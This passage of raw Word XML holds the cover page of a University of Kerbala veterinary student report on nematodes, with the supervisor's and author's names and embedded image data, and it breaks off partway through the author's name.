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E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:caps/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:caps/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ministry of Higher Education and scientific research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:caps/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:caps/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNIVERSITY OF kerbala</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:caps/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:caps/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">College of Veterinary Medicine </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6188075" cy="1207135"/>
            <wp:effectExtent l="0" t="0" r="317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075" cy="1207135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="00F24214" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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8" o:spid="_x0000_s1026" type="#_x0000_t53" alt="Down Ribbon:  COCCIDIOSIS IN CALVES&#10;الكوكسيديا في العجول&#10;" style="position:absolute;margin-left:-5.25pt;margin-top:21.15pt;width:492.75pt;height:1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Y5EF3AwAAlQYAAA4AAABkcnMvZTJvRG9jLnhtbKxVwW4bNxC9F+g/&#10;ECzQWy2tItmW6nVgSHYgwLGNqE3OXJKrZcslGZLyyrkF9iHxbwRBLgGCoAWC/Mnu33TIXalKeggQ&#10;9KAFhxwO5703Mzp6uC4luubWCa1SnOz1MeKKaibUMsW//3b2yyFGzhPFiNSKp/iGO/zw+Mcfjioz&#10;4QNdaMm4RRBEuUllUlx4bya9nqMFL4nb04YrOMy1LYkH0y57zJIKopeyN+j393uVtsxYTblzsDtr&#10;D/FxjJ/nnPrLPHfcI5liyM3Hr43fLHx7x0dksrTEFIJ2aZDvyKIkQsGj21Az4glaWfGfUKWgVjud&#10;+z2qy57Oc0F5xABokv5XaBYFMTxiAXKc2dLk/r+w9OL6yiLBUgxCKVKCRPXf9cfmvv6E6rfNXfMa&#10;1e+au/pN/VfzsrlD4MW4o8DgTFcKPRFZptUEoenldDqfzS8X8wWaX6DpyfnT08XPP61Pfg3Xm9vm&#10;VXMLIe7rD/B7hyDWfRv4c/0ezu6ia1CjMm4CSS3MlQ18OnOu6Z8OKT0tiFryE2t1VXDCgIMk+Pe+&#10;uBAMB1dRVj3WDMCQlddRmHVuyxAQKEfrqP/NVn++9ojC5v5gdDAejDCicJY8GI0OwAhvkMnmurHO&#10;P+K6RGGRYhvxxwfI9bnzsQRYRyRhfyQY5aWEiromEiWDUX9TcTs+g12fA3CJPvBmFxFWm1dD+EwK&#10;cyakRMxAeUFNW+2fCV/EYgmkbJy6cgGpvt1UbSHONF2VXPm2syyXxENbu0IYB89MeJlxKBQ7Z5F5&#10;EMfSJ9BhsYe8kBz5llkfqUUOrATgACDkAqPdOgcEKVYwDzAicglzw8uO5g24gEEqVKV4PAINgum0&#10;FCwAj0aYD3wqLQJiQWVKIe3WT65KkL7dHx6Gx2N+sA2ToN3eEBynTIgSJf7iAatXisWLodhOu7Un&#10;QrZrEEWqkAmPQ6aTXq88t4uCVYiJUB5JP9kP6JkAFQYHHf4t5q+k67c47TLbAos32n0iTUHa/B8M&#10;x+PDjjHXukcE2+ejtZNZbJLQF21/+XW2BmyhWTLNbqBdoIZiLcEkh0Wh7QuMKpiKKXbPV8SCUHKu&#10;oOXGyXAYxmg0htAfof52T7LdE6IohEox9RaUjsbUgw2XVsaKZREoiqCVPoFGzUWopZhsm1dnwOyL&#10;iLo5HYbrrh29/v03Of4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jN90eAAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3FqnaQMlZFOhIG4VogWVqxMvcSC2&#10;o9htw9+znOC42qeZN8Vmsr040Rg67xAW8wQEucbrzrUIb69PszWIEJXTqveOEL4pwKa8vChUrv3Z&#10;7ei0j63gEBdyhWBiHHIpQ2PIqjD3Azn+ffjRqsjn2Eo9qjOH216mSXIjreocNxg1UGWo+dofLUL9&#10;fGh3VdxuK2Vo9Xj4fPf1yxLx+mp6uAcRaYp/MPzqszqU7FT7o9NB9AizRZIxirBKlyAYuLvNeFyN&#10;kGbZGmRZyP8Tyh8AAAD//wMAUEsDBAoAAAAAAAAAIQCZTC8avAwAALwMAAAVAAAAZHJzL21lZGlh&#10;L2ltYWdlMS5qcGVn/9j/4AAQSkZJRgABAQEASwBLAAD/4wMOTVNPIFBhbGV0dGUgrayrvb28w8TE&#10;x8nJys3Oz8/Pz9LU09PU1NbX1dja2NjZ2drc2tvd293g3d3e3t7g3uDi3+Hj4eHj4uPl4uTm4+Xn&#10;5eXn5ufp5ujp6Orr6urs6+zu6+3u7u7w7vDx8fP0mJaUpaOiqamqr62rsLGxtLKxtLW2t7m6uLa0&#10;urq5u7y8vL6/vry6v769v8DAv8LDwsC+wsLBwsPEwsXGxMTFxMbHxcO/xcfGxcfKxsbFxsjJxsnL&#10;yMrMyMvNycjGycrIyczOysrMys3Py8zKy8zOy87Py8/RzM3Ozc7QzdDTzdHVzs3Kzs/Nzs/SztDP&#10;ztHRz9PV0NHV0NLS0NPV0dDN0dDS0dPU0dTW0dXW0tLT0tPT0tTU0tTW0tba09LS09TX09bW09ba&#10;1NTW1NfY1Nfb1dTU1dXU1dbW1dbZ1djb1dnc1tfY1tfb1tja19bV19ja19nZ19nb19rd2NfZ2Nnc&#10;2NrZ2Nrb2Nre2Nvc2Nvf2djZ2dnd2tnZ2tra2tre2tvc2tvf2t3e2t7g29ra29re29vb29vf29zd&#10;29zh293e297h3Nzd3N7e3N7h3ODh3dzb3d3d3d3g3d7f3d/h3d/j3eDj3t7e3t7i3uDh3uHj3uHk&#10;397e397g3+Dg3+Dj3+Dl3+Lk4OHi4OHk4OLi4OLm4OTk4eDh4eHi4eHl4eLj4ePj4ePm4eTn4uHi&#10;4uLk4uTl4uTo4uXm4+Pl4+Tk4+Tl4+Tn4+Xk4+Xo4+bm4+bo5Obo5Ojp5eTl5eTo5eXl5ebn5ebo&#10;5ebp5efn5efp5efq5ubo5ufo5ujo5ujr5unq5+fp5+fr5+jo5+nr5+rr5+vr6Ofr6Ojo6Ojq6Ont&#10;6Ozs6ejr6erq6evs6evt6ezs6unr6urr6urt6uvt6uzs6uzv6u3t6u3v6+vt6+zs6+zv6+3t6+3v&#10;6+7u6+7w7Ozu7O7v7PDw7e3v7e7w7e/v7e/y7fDx7u3v7+/w7+/y7/Dy7/Hx7/Lz8PDy8PLz8PP0&#10;8fHz8fLz8vL08vX28/T19fb4/9sAQwALCAgKCAcLCgkKDQwLDREcEhEPDxEiGRoUHCkkKyooJCcn&#10;LTJANy0wPTAnJzhMOT1DRUhJSCs2T1VORlRAR0hF/9sAQwEMDQ0RDxEhEhIhRS4nLkVFRUVFRUVF&#10;RUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVF/8AAEQgAgACAAwEiAAIR&#10;AQMRAf/EABoAAAMBAQEBAAAAAAAAAAAAAAIDBAEABQf/xAAzEAACAgEEAQMCBAUDBQAAAAABAgMR&#10;ABIhMUEEE1FhInEFMkKBFCNSkaEkYrEzcsHR8f/EABUBAQEAAAAAAAAAAAAAAAAAAAAB/8QAFREB&#10;AQAAAAAAAAAAAAAAAAAAABH/2gAMAwEAAhEDEQA/APosXlxuCxJFbb46OQybsKXr5zyIJw6Aqhlk&#10;O5HQz0I/VeMN5FIf6VPGVFPrJrIBGcHuxtWRK382lFKcaTpI09nA6dEc23XBzx/Ked5ViEmw+pm7&#10;Az1XVpNgdu8UPGjWyRfZvAVHMzMUQUij8x7ONEbsdSuOd8akC1sKT/nAlLBgqVpHNnJFaNMJt31E&#10;7i8BZHkdiVGkflxscPqJyGJ7OcYtJCMQt8ADvKgUjcg+oavgA7j98j8jSZwiihz989BgISLJJrjJ&#10;UjdyZNP1E9jjADxoRLI0jE33lscakggccHMUKqEnb3xgkX9JwNaQkEdfBxcnkcbkAc4uVyCQoG/Z&#10;ORzeQYYGcLq08fOA5HVEDKg+r8if+cLX6jmaU0g2AvbA8iAlC10VH9s1Ikih0O3qE779YHP5KM38&#10;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&#10;LmpwZWdQSwUGAAAAAAYABgB9AQAAzBQAAAAA&#10;" adj="2700" strokecolor="#1f5462 [1544]">
            <v:fill r:id="rId6" o:title="  COCCIDIOSIS IN CALVES&#10;الكوكسيديا في العجول&#10;" recolor="t" rotate="t" type="tile"/>
            <v:shadow on="t" color="black" opacity="22936f" origin="-.5,-.5" offset="1.99561mm,1.99561mm"/>
            <v:textbox>
              <w:txbxContent>
                <w:p w:rsidR="006C65E2" w:rsidRPr="00C075EB" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:b/>
                      <w:caps/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="56"/>
                      <w:szCs w:val="56"/>
                      <w:rtl/>
                      <w:lang w:bidi="ar-IQ"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C075EB">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:b/>
                      <w:caps/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="56"/>
                      <w:szCs w:val="56"/>
                      <w:lang w:bidi="ar-IQ"/>
                    </w:rPr>
                    <w:t>NEMATOD</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:b/>
                      <w:caps/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="56"/>
                      <w:szCs w:val="56"/>
                      <w:lang w:bidi="ar-IQ"/>
                    </w:rPr>
                    <w:t>ES</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="006C65E2" w:rsidRPr="00C075EB" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:b/>
                      <w:caps/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="56"/>
                      <w:szCs w:val="56"/>
                      <w:rtl/>
                      <w:lang w:bidi="ar-IQ"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
                      <w:b/>
                      <w:caps/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="56"/>
                      <w:szCs w:val="56"/>
                      <w:rtl/>
                      <w:lang w:bidi="ar-IQ"/>
                    </w:rPr>
                    <w:t>الديدان الأسطوانية</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Supervision </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial" w:hint="cs"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
        <w:t>أشراف</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Assistant Professor Dr. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hayder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C7107">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Badri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C7107">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Abboud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial" w:hint="cs"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-IQ"/>
        </w:rPr>
        <w:t>الأستاذ المساعد الدكتور حيدر بدري عبود</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="650101"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahmed Mohammed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsia="Arial" w:hAnsi="Arial Black" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
